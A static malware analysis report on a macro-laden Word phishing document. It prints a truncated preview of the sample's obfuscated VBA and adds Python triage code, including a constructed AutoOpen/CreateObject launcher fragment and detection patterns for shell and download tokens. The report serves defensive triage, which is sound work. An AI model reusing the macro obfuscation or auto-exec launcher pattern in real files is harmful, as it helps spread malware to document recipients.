Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fe935b77ccc4185a…

MALICIOUS

Office (OLE)

Size: 206.0 KB
Created: 2018-03-06 14:35:00
Authoring application: Microsoft Office Word
First seen: 2018-08-05
MD5: 90525bb38aa3890cf0092a5ae3b2ce13
SHA-1: 3651c470cc5a9c7088cdcafd33f8fd42cf8d9960
SHA-256: fe935b77ccc4185ab74b2aa7780dd0f922431f3292d346c8a0a9e9bfb7da1e4c
Risk Score: 164

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office (OLE) Word document containing a VBA macro. An 'AutoOpen' auto-execution entry point is present and the macro calls 'CreateObject'; together with the shell/download/object-execution tokens found in the compiled VBA stream, this indicates an attempt to run further code, most likely to download and execute a second-stage payload. The macro source is heavily obfuscated (junk arithmetic statements over never-assigned variables, kept from crashing by 'On Error Resume Next', and string constants passed through a decoding function), so the exact download URL or payload could not be determined statically. The only URL recovered from the document is the DrawingML schema namespace in the OLE body, which is document structure rather than an indicator. The 'macros.bas' artifact is the decoded VBA source carved by olevba; its presence confirms that a VBA project was recovered, so the legacy WordBasic heuristic below (which reports that none was) should be read as redundant with the VBA findings, not as independent evidence.

Heuristics (7)

  • VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
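The heuristics above can be reproduced over decoded VBA source with a few regular expressions. The following is an added example written for this report, not the analysis engine's own code: it constructs a small VBA fragment modelled on the extracted macro (the module name, the string constant, the junk arithmetic and the decoder name dd333h3sd are copied from the preview; the AutoOpen stub, the CreateObject call and the base64 blob are invented for illustration), then reports the same finding IDs as the page, counts junk-arithmetic lines and base64-like blobs, and classifies any URL so that a schema namespace such as schemas.openxmlformats.org is not mistaken for a contact point. The finding name VBA_AUTOEXEC_WITH_EXEC_TOKENS is an assumption standing in for the p-code heuristic, which this code evaluates on source rather than on the compiled stream.

```python
import re
from typing import Dict, List
from urllib.parse import urlparse

# Constructed VBA fragment modelled on the report's extracted macros.bas
# (AutoOpen entry point, CreateObject call, junk arithmetic under
# On Error Resume Next, one long base64-like blob). NOT the sample's code.
SAMPLE_VBA = '''Attribute VB_Name = "UjwftfzdTPPR"
Sub AutoOpen()
    LfzAFLnJ
End Sub
Function LfzAFLnJ()
On Error Resume Next
VKKcN = "EAJBmLAEKqNiiuAJtlQLmav%!!%4rav%!!%3raMAjPFhktMYBTQJSi"
XzvBcjn = 6314454 / Atn(HdOiNwzL) / (9677584 - KwimEwzXKUif / 4673935)
blob = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODk="
Set o = CreateObject(dd333h3sd(VKKcN, 17, 17))
o.Run blob, 0
End Function
'''

# Auto-execution entry points (Word and Excel) and execution/download tokens.
AUTOEXEC = re.compile(r"\b(AutoOpen|AutoExec|AutoClose|Document_Open|Workbook_Open)\b", re.I)
EXEC_TOKENS = re.compile(
    r"\b(CreateObject|GetObject|Shell|ShellExecute|Run|WScript\.Shell|"
    r"XMLHTTP|URLDownloadToFile|ADODB\.Stream|powershell|cmd\.exe)\b", re.I)
# Arithmetic built from numeric literals and math/conversion builtins, e.g.
# "x = 6314454 / Atn(HdOiNwzL) / ...": the junk pattern seen in the preview.
JUNK_MATH = re.compile(r"=\s*\d+\s*/\s*(Atn|Sqr|Sgn|CDate|CLng|CStr)\(", re.I)
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL = re.compile(r"https?://[^\s\"'<>]+", re.I)

# Hosts that appear in OOXML/DrawingML namespace declarations; a URL on one of
# these is document structure, not a contact point. (Assumed allow-list.)
NAMESPACE_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com",
                   "www.w3.org", "purl.org"}


def classify_url(url: str) -> str:
    """'schema-namespace' for known XML namespace hosts, else 'review'."""
    host = (urlparse(url).hostname or "").lower()
    return "schema-namespace" if host in NAMESPACE_HOSTS else "review"


def triage(vba_source: str) -> Dict[str, object]:
    """Reproduce the report's macro heuristics over decoded VBA source."""
    findings: List[str] = []
    if vba_source.strip():
        findings.append("OLE_VBA_MACROS")
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(vba_source)}, key=str.lower)
    exec_tokens = sorted({m.group(1) for m in EXEC_TOKENS.finditer(vba_source)}, key=str.lower)
    if any(t.lower() == "autoopen" for t in autoexec):
        findings.append("OLE_VBA_AUTOOPEN")
    if any(t.lower() == "createobject" for t in exec_tokens):
        findings.append("OLE_VBA_CREATEOBJ")
    # Same condition as the p-code heuristic: an auto-exec token together with
    # at least one shell/download/object-execution token (here on source).
    if autoexec and exec_tokens:
        findings.append("VBA_AUTOEXEC_WITH_EXEC_TOKENS")
    lines = [ln for ln in vba_source.splitlines() if ln.strip()]
    junk = [ln for ln in lines if JUNK_MATH.search(ln)]
    blobs = BASE64_BLOB.findall(vba_source)
    urls = {u: classify_url(u) for u in URL.findall(vba_source)}
    obfuscated = bool(junk) or bool(blobs) or "on error resume next" in vba_source.lower()
    return {
        "findings": findings,
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "junk_arithmetic_lines": len(junk),
        "base64_like_blobs": len(blobs),
        "urls": urls,
        "obfuscation_likely": obfuscated,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On the constructed fragment this yields the four VBA findings, one junk-arithmetic line and one base64-like blob. The token lists are deliberately broad (plain `Run` and `Shell` included), which is why the report treats a bare token hit as a heuristic rather than a verdict; the auto-exec plus execution-token co-occurrence is the combination worth escalating on.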

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  71989 bytes
SHA-256: 970c6a98008cc16e786b455ad1ff7afb89ffe63ee697dc8cab6a6b3e872d0fcb
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 22 long base64-like blobs)
Preview script: first 1,000 lines of the extracted script (two modules concatenated by olevba: ThisDocument and UjwftfzdTPPR)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UjwftfzdTPPR"
Function LfzAFLnJ()
On Error Resume Next
VKKcN = "EAJBmLAEKqNiiuAJtlQLmav%!!%4rav%!!%3raMAjPFhktMYBTQJSi"
XzvBcjn = 6314454 / Atn(HdOiNwzL) / (9677584 - KwimEwzXKUif / 4673935 - Sqr(jMCIiPtbj * CStr(EMTKlabImiY / Sgn(754915 - CDate(1033341 / UFEaiMlcE * 7881080 * Sqr(AtohitjOwircmm))))) + (tatqBcHjnYL - 3728119 / 8630970 / CLng(4484362)))
BEzvbjN = 9586015 / Atn(HiMkjmaDpo) / (7989198 - nddRow / 3643600 - Sqr(jOnWtNA * CStr(XZqrBG / Sgn(6857935 - CDate(9549869 / BDGzpBMmBs * 2038429 * Sqr(tfuEmssrqqSlSf))))) + (wwFjtfr - 7384925 / 9062140 / CLng(2307032)))
pCbvdDPVLp = PQtWwbTzNFLtqb + dd333h3sd(VKKcN, 17, 17)
NQOtswoRwJ = "UvmSYzSbSP !%6Vfjaz"
XfYkUPYTzV = 8221165 / Atn(RoBwPDCLCpWJbS) / (970778 - DFridOXQ / 766984 - Sqr(LBSrQLFikI * CStr(qwIoRKzDRjwGL / Sgn(293673 - CDate(7594822 / ISCQlsosA * 8744770 * Sqr(ZKDwiwY))))) + (GjuMEaM - 7478110 / 9077490 / CLng(2478157)))
PQRODs = 9035151 / Atn(pcozMi) / (8438424 - wKPnXz / 4571060 - Sqr(NkQKmpjnNFzpY * CStr(sfFmUw / Sgn(4315913 - CDate(1146457 / zERNwTHoEDT * 4892123 * Sqr(wkVAwBj))))) + (kBisRk - 6398894 / 7248593 / CLng(5968349)))
pzlwMsLP = tNbjsUq + dd333h3sd(NQOtswoRwJ, 6, 4)
WBzPKvQij = "frABZPrQTaBwriidWZHKhcjoLsoz"
koLXwl = 2821215 / Atn(HvwcXEVw) / (2285294 - WERmMskcPhwIES / 6097152 - Sqr(JMhkW * CStr(BajsvKA / Sgn(6764573 - CDate(6705707 / kjrdzP * 6681071 * Sqr(CCMhVzqiwSuJ))))) + (bcIDqFUw - 4923752 / 5333525 / CLng(6240665)))
LMcTrfRXSXP = 9673407 / Atn(XYbCHudtiTBU) / (1050407 - BROhoZsIDja / 1271832 - Sqr(Oqcbjj * CStr(bSDuLAjXsIG / Sgn(6771883 - CDate(7148657 / SfKtrZwOU * 8381436 * Sqr(BlPDFsVkZE))))) + (OUWosVQvcrV - 6875773 / 9204270 / CLng(2230716)))
siAwqj = WHAQFUbjUG + dd333h3sd(WBzPKvQij, 3, 2)
LYOkiBYNuaB = "LZOfcRCbLDETSKjECCrElbu"
RqkhKR = 7402584 / Atn(wMBzwi) / (5738441 - GViLdYd / 5049276 - Sqr(UnmNhnzFZjrf * CStr(oIarjmDGa / Sgn(7596278 - CDate(9814868 / GScSaCsTkXiA * 8748681 * Sqr(YBrXBmi))))) + (jZlmsqWjuAn - 4767505 / 5226698 / CLng(4089611)))
oORzwSUaclq = 4537036 / Atn(ziwMoRaazROC) / (2996121 - lMJYl / 530477 - Sqr(nKCzEdiNUnD * CStr(EXXnStPzKp / Sgn(5157400 - CDate(5428669 / QqOaOCjU * 1121411 * Sqr(UwPkosN))))) + (iKZLfOZrfW - 649744 / 4412630 / CLng(9616922)))
WqZcScQCj = hoKjMwLS + dd333h3sd(LYOkiBYNuaB, 5, 1)
fnDLRFQn = "bYsjJYT=EOtn"
RrqLkd = 810592 / Atn(pijZwVtNWKVM) / (639141 - ihDqkfUwNpVGVT / 1594655 - Sqr(zAiiAYr * CStr(tWvFNq / Sgn(9170151 - CDate(1641480 / jPfzYo * 4735376 * Sqr(qRtDrzZE))))) + (NVhVvJ - 8035059 / 9704955 / CLng(9305836)))
EHCqrovPrAI = 2787224 / Atn(OkWtNApDcOYL) / (1211564 - JHzBCWV / 92464 - Sqr(daakkF * CStr(BcaoFGvzqrJVc / Sgn(8767198 - CDate(7836489 / bHmCrwu * 8444048 * Sqr(OitTmPE))))) + (mNvkSICMzLKMzY - 2362069 / 7832198 / CLng(3001038)))
svGcESLo = adnmTmFlUIw + dd333h3sd(fnDLRFQn, 5, 1)
wCwjvDHWi = "HmcmwjTSHiAAi% tes&&s=%jzN"
siYIzGPLMaw = 2508730 / Atn(suJzjHRSYzGjc) / (8486826 - fXuXoNRhGuOkPY / 6464233 - Sqr(sTljEOnW * CStr(rwZJlBIvQT / Sgn(2285318 - CDate(4029016 / YcbNCEUXBtrjN * 2545587 * Sqr(ItRjYszRrXVsG))))) + (wFVwzuJHrMiC - 1408768 / 8033190 / CLng(478906)))
UzKRVsLpMz = 6604188 / Atn(XoSmWCcwza) / (2173377 - qhLOjCoVjOS / 6361868 - Sqr(CEAVl * CStr(OJuzEn / Sgn(229749 - CDate(5465185 / tzzTz * 4481930 * Sqr(fWoYn))))) + (MtJWllT - 9515986 / 5377694 / CLng(5277720)))
auVWPkwPK = dwDzEiiZrcBjDb + dd333h3sd(wCwjvDHWi, 4, 10)
SUvZkiz = "FzSnJE tjloilnw"
jLUHGDw = 9918871 / Atn(nXvwZwRaUZVu) / (6914098 - drZSEDPZJ / 5234206 - Sqr(sitvcPmiZjzMXm * CStr(bjijUniEHKjzF / Sgn(9268131 - CDate(4930121 / NTBhOYi * 8521220 * Sqr(jQKtdi))))) + (jKcfv - 5120914 / 1288006 / CLng(1893540)))
iIZhcinmSbi = 1746673 / Atn(llwQhhzSms) / (4287526 - fCFmZ / 7175952 - Sqr(YKijfTvUt * CStr(nNrYkmtw / Sgn(8726498 - CDate(336260 / LbrlibiZaIB * 4112053 * Sqr(lTHFQ
... (truncated)
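Most of the preview above is noise: assignments of arithmetic over variables that are never assigned anywhere (Variant Empty, so Atn(Empty) is 0 and the division faults with error 11), which is what the 'On Error Resume Next' at the top of the function is there to swallow. Stripping those lines leaves only the string constants and the calls to the decoder dd333h3sd. The following is an added example written for this report, not tooling from the page: it runs a conservative junk-assignment filter over a constructed fragment copied in style from the preview (identifiers VKKcN, NQOtswoRwJ, dd333h3sd and the arithmetic shape are taken from it; the expression bodies are shortened). A line is dropped only when it assigns no string, calls nothing but VBA math/conversion builtins, reads only names the module never defines, and has a target that is never read; since the preview is truncated, unread targets alone are not grounds for removal.

```python
import re
from typing import List, Set, Tuple

# Constructed fragment in the style of the report's macros.bas preview, not the
# sample's real code: string constants consumed by dd333h3sd(), interleaved
# with arithmetic assignments whose results are never read.
NOISY_MACRO = '''Function LfzAFLnJ()
On Error Resume Next
VKKcN = "EAJBmLAEKqNiiuAJtlQLmav%!!%4rav%!!%3raMAjPFhktMYBTQJSi"
XzvBcjn = 6314454 / Atn(HdOiNwzL) / (9677584 - KwimEwzXKUif / 4673935 - Sqr(jMCIiPtbj))
BEzvbjN = 9586015 / Atn(HiMkjmaDpo) / (7989198 - nddRow / 3643600)
pCbvdDPVLp = PQtWwbTzNFLtqb + dd333h3sd(VKKcN, 17, 17)
NQOtswoRwJ = "UvmSYzSbSP !%6Vfjaz"
XfYkUPYTzV = 8221165 / Atn(RoBwPDCLCpWJbS) / (970778 - DFridOXQ / 766984)
pzlwMsLP = tNbjsUq + dd333h3sd(NQOtswoRwJ, 6, 4)
End Function
'''

# Simple single-line assignment "name = expr" or "Set name = expr". Lines
# such as "If a = b Then" do not match because "If" is not followed by "=".
ASSIGN = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.*)$")
IDENT = re.compile(r"[A-Za-z_]\w*")
CALL = re.compile(r"([A-Za-z_]\w*)\s*\(")
PROC = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Function|Sub)\s+([A-Za-z_]\w*)", re.I)
# VBA math/conversion builtins the junk expressions lean on (side-effect free).
BUILTINS = {"atn", "sqr", "sgn", "cdate", "clng", "cstr", "cint", "cdbl",
            "abs", "int", "fix", "log", "exp"}


def is_junk(target: str, rhs: str, defined: Set[str], referenced: Set[str]) -> bool:
    """True when an assignment is side-effect-free arithmetic over Empty variables."""
    if '"' in rhs:
        return False                      # string constant: may feed the decoder
    if target in referenced:
        return False                      # its value is read somewhere
    for fn in CALL.findall(rhs):
        if fn.lower() not in BUILTINS:
            return False                  # user function / object creation: side effects
    names = [n for n in IDENT.findall(rhs) if n.lower() not in BUILTINS]
    if any(n in defined for n in names):
        return False                      # touches state the macro actually sets
    return bool(names)                    # arithmetic over never-assigned (Empty) names


def strip_junk_assignments(src: str) -> Tuple[List[str], List[str]]:
    """Return (kept_lines, dropped_lines) for a VBA module or fragment."""
    lines = src.splitlines()
    # Names the macro defines: assignment targets and procedure names.
    defined: Set[str] = set()
    for ln in lines:
        m = ASSIGN.match(ln) or PROC.match(ln)
        if m:
            defined.add(m.group(1))
    # Names read anywhere other than as their own assignment target.
    referenced: Set[str] = set()
    for ln in lines:
        m = ASSIGN.match(ln)
        referenced.update(IDENT.findall(m.group(2) if m else ln))
    kept: List[str] = []
    dropped: List[str] = []
    for ln in lines:
        m = ASSIGN.match(ln)
        if m and is_junk(m.group(1), m.group(2), defined, referenced):
            dropped.append(ln)
        else:
            kept.append(ln)
    return kept, dropped


if __name__ == "__main__":
    kept, dropped = strip_junk_assignments(NOISY_MACRO)
    print(f"dropped {len(dropped)} junk assignment(s)")
    print("\n".join(kept))
```

On the constructed fragment the three Atn() lines are removed and the two decoder calls with their string inputs survive. What remains still cannot be decoded from the page: the body of dd333h3sd is not in the preview, and the report's own conclusion that the download URL could not be determined stands. The filter is also deliberately line-based; a macro that splits statements with the VBA line-continuation character would need the continuations joined first.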